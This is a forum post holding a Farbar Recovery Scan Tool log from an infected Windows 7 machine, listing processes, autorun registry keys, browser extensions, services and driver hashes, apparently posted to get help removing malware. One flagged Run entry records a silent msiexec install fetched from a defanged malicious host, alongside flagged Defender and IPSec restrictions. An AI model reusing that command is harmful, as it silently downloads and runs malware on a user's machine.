markusMj
Junior Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27.01.2018
Ran by Markus (administrator) on MARKUS-ПК (07-02-2018 16:40:34)
Running from C:\Users\Markus\Desktop\FRST
Loaded Profiles: Markus (Available Profiles: Markus)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Русский (Россия)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.02\AsSysCtrlService.exe
(E-MU Systems) C:\Windows\System32\emaudsv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
(Ибах О. И.) C:\Program Files (x86)\Energy Controller 2\EnergyController2.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7Debug\mdm.exe
() C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXSERVR.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Program Files\Prio\prio_svc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
() C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXKERNL.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11613288 2010-11-19] (Realtek Semiconductor)
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-15] (Logitech Inc.)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM\...\Run: [COMODO Internet Security] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1275608 2014-03-05] (COMODO)
HKLM-x32\...\Run: [UpdReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [105040 2013-03-30] (VMware, Inc.)
HKLM-x32\...\Run: [vmware-tray] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [105040 2013-03-30] (VMware, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QT Lite\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2017-12-14] (AVAST Software)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [AlcoholAutomount] => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [33120 2010-08-20] (Alcohol Soft Development Team)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [Energy Controller 2] => C:\Program Files (x86)\Energy Controller 2\EnergyController2.exe [2174464 2012-01-30] (Ибах О. И.)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\Run: [DAEMON Tools Pro Agent] => C:\Program Files\DAEMON Tools Pro\DTAgent.exe [3111744 2012-04-26] (DT Soft Ltd)
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: J - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {2509e17e-7eed-11e3-a225-005056c00008} - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {eb9c51e7-4af1-11e2-b73e-ddab5332bf92} - J:\Launcher.exe
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\...\MountPoints2: {eb9c51e9-4af1-11e2-b73e-ddab5332bf92} - J:\Launcher.exe
AppInit_DLLs: prio.dll => C:\Program Files\Prio\prio.dll [12496 2010-07-28] (O&K Software)
AppInit_DLLs-x32: prio32.dll => C:\Program Files\Prio\prio32.dll [10960 2010-07-28] (O&K Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-01-07]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
BootExecute: autocheck autochk * Partizan
GroupPolicy: Restriction <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{5218e2d6-9bb8-4649-a7d0-aaa085b1e5bc} <==== ATTENTION (Restriction - IP)
Hosts: 127.0.0.1 validation.sls.microsoft.com
Tcpip\Parameters: [DhcpNameServer] 195.95.139.24 91.216.28.254
Tcpip\..\Interfaces\{28CF20D8-E6E5-4A2C-8E52-B17998F4D4A1}: [DhcpNameServer] 195.95.139.24 91.216.28.254
Internet Explorer:
==================
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yandex.ru/?clid=1782898
HKU\S-1-5-21-2008689014-3463650501-2238215348-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://ru.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2008689014-3463650501-2238215348-1000 -> DefaultScope {01A3E930-C75D-4105-9BED-9F84195012FC} URL = hxxp://yandex.ru/yandsearch?clid=1782899&text={searchTerms}
SearchScopes: HKU\S-1-5-21-2008689014-3463650501-2238215348-1000 -> {01A3E930-C75D-4105-9BED-9F84195012FC} URL = hxxp://yandex.ru/yandsearch?clid=1782899&text={searchTerms}
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2012-12-22] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-12-14] (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2012-12-22] (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-02-01] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-12-14] (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: IE 4.x-6.x BHO for Download Master -> {9961627E-4059-41B4-8E0E-A7D6B3854ADF} -> C:\Program Files (x86)\Download Master\dmiehlp.dll [2008-10-24] (WestByte)
BHO-x32: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-02-01] (Oracle Corporation)
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-12-25] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-12-25] (Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default [2018-02-07]
FF NetworkProxy: Mozilla\Firefox\Profiles\00ozl3kw.default -> ftp", "131.161.26.142"
FF Extension: (Best Proxy Switcher) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\bestproxyswitcher@bestproxyswitcher.com.xpi [2018-01-29]
FF Extension: (FoxyProxy Standard) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\foxyproxy@eric.h.jung [2018-01-20] [Legacy]
FF Extension: (S3.Переводчик) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\s3google@translator.xpi [2018-01-30]
FF Extension: (User Agent Switcher) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2016-10-14] [Legacy]
FF Extension: (FoxLingo) - C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\Extensions\{ef62e1ce-d2a4-4cdd-b7ec-92b120366b66} [2013-06-08] [Legacy] [not signed]
FF SearchPlugin: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\searchplugins\yandex.ru-212346.xml [2013-05-13]
FF SearchPlugin: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\00ozl3kw.default\searchplugins\yqs-barff-yandex.xml [2013-01-25]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2017-12-14] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-10-07] ()
FF Plugin: @java.com/DTPlugin,version=10.10.2 -> C:\Windows\system32\npDeployJava1.dll [2012-12-22] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.10.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2012-12-22] (Oracle Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-10-07] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-02-01] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-02-01] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-07-31] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-16] (Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default [2018-02-07]
CHR Extension: (Презентации) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-17]
CHR Extension: (Документы) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-17]
CHR Extension: (Диск Google) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-17]
CHR Extension: (YouTube) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-17]
CHR Extension: (Disable Youtube™ HTML5 Player) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\enmofgaijnbjpblfljopnpdogpldapoc [2017-08-13]
CHR Extension: (Таблицы) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-17]
CHR Extension: (Google Документы офлайн) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-01-17]
CHR Extension: (Avast Online Security) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2018-01-04]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Browsec VPN - Free and Unlimited VPN) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\omghfjlpggmjjaagoclmmobgdodcjboh [2018-01-16]
CHR Extension: (Gmail) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-01-17]
CHR Extension: (Chrome Media Router) - C:\Users\Markus\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-13]
CHR Profile: C:\Users\Markus\AppData\Local\Google\Chrome\User Data\System Profile [2018-01-29]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-03-03] (Adobe Systems) [File not signed]
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.02\AsSysCtrlService.exe [90112 2009-08-19] (ASUSTeK Computer Inc.) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2017-12-14] (AVAST Software)
R2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6802624 2014-03-05] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2264280 2014-03-05] (COMODO)
S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-14] (Корпорация Майкрософт)
R2 emaudsv; C:\Windows\system32\emaudsv.exe [26624 2010-10-06] (E-MU Systems)
S2 FlexService; C:\Program Files (x86)\RapidBIT\cisvc.exe [41984 2009-05-17] (BitMicro Software Corporation) [File not signed]
R2 hasplms; C:\Windows\system32\hasplms.exe [4180576 2010-09-27] (SafeNet Inc.)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-03-30] (LogMeIn, Inc.)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Nexus Server; C:\Program Files (x86)\Common Files\Rhozet\Carbon Coder\Kernel\PNXSERVR.exe [757891 2010-12-08] () [File not signed]
R2 prio_svc; C:\Program Files\Prio\prio_svc.exe [9936 2010-07-28] ()
S3 ServiceLayer; C:\Program Files (x86)\PC Connectivity Solution\ServiceLayer.exe [628736 2010-12-08] (Nokia) [File not signed]
S2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-24] (StarWind Software) [File not signed]
S3 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [13242960 2013-02-26] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-14] (Корпорация Майкрософт)
S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-14] (Корпорация Майкрософт)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 adusbser; C:\Windows\System32\DRIVERS\adusbser.sys [145024 2008-01-02] (AnyDATA Corporation)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2009-08-04] ()
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2017-12-14] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2017-12-14] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2017-12-14] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2017-12-14] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2017-12-14] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2017-12-14] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2017-12-14] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2017-12-14] (AVAST Software)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. )
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [23168 2014-03-05] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [738472 2014-03-05] (COMODO)
R1 cmdHlp; C:\Windows\System32\DRIVERS\cmdhlp.sys [48360 2014-03-05] (COMODO)
S3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 emusba10; C:\Windows\System32\DRIVERS\emusba10.sys [215000 2010-10-06] (E-MU Systems)
R1 inspect; C:\Windows\System32\DRIVERS\inspect.sys [105552 2014-03-05] (COMODO)
R0 mountmgr; C:\Windows\System32\drivers\mountmgr.sys [94592 2010-11-21] (Корпорация Майкрософт)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-16] ()
R1 networx; C:\Windows\System32\drivers\networx.sys [56968 2011-02-08] (NetFilterSDK.com)
U0 Partizan; C:\Windows\SysWOW64\drivers\Partizan.sys [40304 2017-07-20] (Greatis Software)
R1 PStrip64; C:\Windows\System32\drivers\pstrip64.sys [13008 2006-09-30] ()
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-03-03] (Duplex Secure Ltd.)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [31824 2013-02-26] (VMware, Inc.)
R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363392 2010-11-21] (Корпорация Майкрософт)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [70296 2012-10-24] (VMware, Inc.)
R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [270608 2017-10-22] (BigNox Corporation)
U3 a37m65i9; C:\Windows\System32\Drivers\a37m65i9.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
U3 ac2cjxl8; C:\Windows\System32\Drivers\ac2cjxl8.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
S3 cpuz139; \??\C:\Users\Markus\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X] <==== ATTENTION
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
S4 nvvhci; system32\DRIVERS\nvvhci.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
========================== Drivers MD5 =======================
C:\Windows\system32\drivers\1394ohci.sys ==> MD5 is legit
C:\Windows\System32\drivers\ACPI.sys ==> MD5 is legit
C:\Windows\system32\drivers\acpipmi.sys ==> MD5 is legit
C:\Windows\system32\drivers\adp94xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpu320.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\adusbser.sys C0C4AE63777B3D3DCD019203E7FDA342
C:\Windows\system32\drivers\afd.sys D5B031C308A409A0A576BFF4CF083D30
C:\Windows\system32\drivers\agp440.sys ==> MD5 is legit
C:\Windows\system32\drivers\aksdf.sys 94C0972B06C75456ED574DD46417B1D8
C:\Windows\system32\drivers\aksfridge.sys 7B0BC062CA6ABAB23F88EA483B5A538E
C:\Windows\system32\drivers\aliide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdk8.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\amdppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsata.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsbs.sys ==> MD5 is legit
C:\Windows\System32\drivers\amdxata.sys ==> MD5 is legit
C:\Windows\system32\drivers\appid.sys B84DDCCB03A9CEDC1E90A88EDA5306DB
C:\Windows\system32\drivers\arc.sys ==> MD5 is legit
C:\Windows\system32\drivers\arcsas.sys ==> MD5 is legit
C:\Windows\SysWow64\drivers\AsIO.sys A82C01606DC27D05D9D3BFB6BB807E32
C:\Windows\system32\drivers\aswHwid.sys 9B480B472D6826E7257C90E2D0EE2954
C:\Windows\system32\drivers\aswMonFlt.sys 1BB00571CC2C78463ABD7E9C32970758
C:\Windows\system32\drivers\aswRdr2.sys 7010B57D708DA5C9686A5923EE621776
C:\Windows\System32\Drivers\aswRvrt.sys 937885085BFE5BD08EC1BC0245DD203B
C:\Windows\system32\drivers\aswSnx.sys 0B6352251C5D84130DF4252D33D266C2
C:\Windows\system32\drivers\aswSP.sys 28213B34725B18387CC1B8C3D73858A1
C:\Windows\system32\drivers\aswStm.sys 9C58B6E9663D0A76D00D83E43C765BDF
C:\Windows\System32\Drivers\aswVmm.sys D60D9201739400F0FBDB9E36A3212D91
C:\Windows\System32\DRIVERS\asyncmac.sys ==> MD5 is legit
C:\Windows\System32\drivers\atapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AtiPcie.sys C07A040D6B5A42DD41EE386CF90974C8
C:\Windows\system32\drivers\bxvbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Beep.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\blbdrive.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bowser.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltLo.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltUp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Brserid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrSerWdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbMdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbSer.sys ==> MD5 is legit
C:\Program Files (x86)\BlueStacks\BstkDrv.sys 7DB8EE09821A6D81A19A6591C9B8AA3A
C:\Windows\system32\drivers\bthmodem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdfs.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdrom.sys ==> MD5 is legit
C:\Windows\system32\drivers\circlass.sys ==> MD5 is legit
C:\Windows\System32\CLFS.sys ==> MD5 is legit
C:\Windows\system32\drivers\CmBatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cmderd.sys 174E3E39D4DE0FB3A6F4AD3110ACEB5F
C:\Windows\System32\DRIVERS\cmdguard.sys 31BFE340F5E1B8329A5C32B103CC3948
C:\Windows\System32\DRIVERS\cmdhlp.sys 31E574FBF054D2DAF4CB35A480EFD129
C:\Windows\system32\drivers\cmdide.sys ==> MD5 is legit
C:\Windows\System32\Drivers\cng.sys A98CED39AD91B445E2E442A9BD67E8B4
C:\Windows\system32\drivers\compbatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\CompositeBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\cpuz135_x64.sys C08063F052308B6F5882482615387F30
C:\Windows\system32\drivers\crcdisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\csc.sys ==> MD5 is legit
C:\Windows\System32\Drivers\dfsc.sys ==> MD5 is legit
C:\Windows\System32\drivers\discache.sys ==> MD5 is legit
C:\Windows\System32\drivers\disk.sys ==> MD5 is legit
C:\Windows\system32\drivers\dmvsc.sys 5DB085A8A6600BE6401F2B24EECB5415
